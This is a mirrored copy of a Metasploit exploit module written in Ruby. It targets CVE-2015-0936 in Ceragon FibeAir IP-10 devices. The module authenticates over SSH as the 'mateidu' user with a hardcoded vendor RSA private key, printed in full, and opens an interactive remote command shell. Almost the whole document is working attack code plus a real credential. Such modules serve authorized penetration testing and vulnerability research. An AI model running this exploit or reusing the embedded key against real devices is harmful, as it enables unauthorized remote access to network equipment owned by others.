Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
26985 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'net/ssh'

7
require 'net/ssh/command_stream'

8


9
class MetasploitModule < Msf::Exploit::Remote

10
  include Msf::Auxiliary::Report

11
  include Msf::Exploit::Remote::SSH

12


13
  Rank = ExcellentRanking

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        {

20
          'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure',

21
          'Description' => %q{

22
            Ceragon ships a public/private key pair on FibeAir IP-10 devices

23
            that allows passwordless authentication to any other IP-10 device.

24
            Since the key is easily retrievable, an attacker can use it to

25
            gain unauthorized remote access as the "mateidu" user.

26
          },

27
          'Platform' => 'unix',

28
          'Arch' => ARCH_CMD,

29
          'Privileged' => false,

30
          'Targets' => [ [ 'Universal', {} ] ],

31
          'Payload' => {

32
            'Compat' => {

33
              'PayloadType' => 'cmd_interact',

34
              'ConnectionType' => 'find'

35
            }

36
          },

37
          'Author' => [

38
            'hdm', # Discovery

39
            'todb' # Metasploit module and advisory text (mostly copy-paste)

40
          ],

41
          'License' => MSF_LICENSE,

42
          'References' => [

43
            ['CVE', '2015-0936'],

44
            ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure

45
            ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH],

46
          ],

47
          'DisclosureDate' => '2015-04-01', # Not a joke

48
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

49
          'DefaultTarget' => 0,

50
          'Notes' => {

51
            'Stability' => [CRASH_SAFE],

52
            'Reliability' => [REPEATABLE_SESSION],

53
            'SideEffects' => []

54
          }

55
        }

56
      )

57
    )

58


59
    register_options(

60
      [

61
        # Since we don't include Tcp, we have to register this manually

62
        Opt::RHOST(),

63
        Opt::RPORT(22)

64
      ], self.class

65
    )

66


67
    register_advanced_options(

68
      [

69
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),

70
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])

71
      ]

72
    )

73
  end

74


75
  # helper methods that normally come from Tcp

76
  def rhost

77
    datastore['RHOST']

78
  end

79


80
  def rport

81
    datastore['RPORT']

82
  end

83


84
  def do_login(user)

85
    opt_hash = ssh_client_defaults.merge({

86
      auth_methods: ['publickey'],

87
      port: rport,

88
      key_data: [ key_data ]

89
    })

90
    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']

91
    begin

92
      ssh_socket = nil

93
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

94
        ssh_socket = Net::SSH.start(rhost, user, opt_hash)

95
      end

96
    rescue Rex::ConnectionError

97
      return nil

98
    rescue Net::SSH::Disconnect, ::EOFError

99
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

100
      return nil

101
    rescue ::Timeout::Error

102
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"

103
      return nil

104
    rescue Net::SSH::AuthenticationFailed

105
      print_error "#{rhost}:#{rport} SSH - Failed authentication"

106
      return nil

107
    rescue Net::SSH::Exception => e

108
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"

109
      return nil

110
    end

111


112
    if ssh_socket

113


114
      # Create a new session from the socket, then dump it.

115
      conn = Net::SSH::CommandStream.new(ssh_socket, logger: self)

116
      ssh_socket = nil

117


118
      return conn

119
    else

120
      return nil

121
    end

122
  end

123


124
  def exploit

125
    conn = do_login('mateidu')

126
    if conn

127
      print_good "#{rhost}:#{rport} - Successful login"

128
      handler(conn.lsock)

129
    end

130
  end

131


132
  def key_data

133
    <<~EOF

134
      -----BEGIN RSA PRIVATE KEY-----

135
      MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr

136
      MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+

137
      IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB

138
      gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3

139
      CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv

140
      4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY

141
      SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6

142
      B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV

143
      93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc

144
      WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP

145
      YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll

146
      7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT

147
      uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg==

148
      -----END RSA PRIVATE KEY-----

149
    EOF

150
  end

151
end

152


153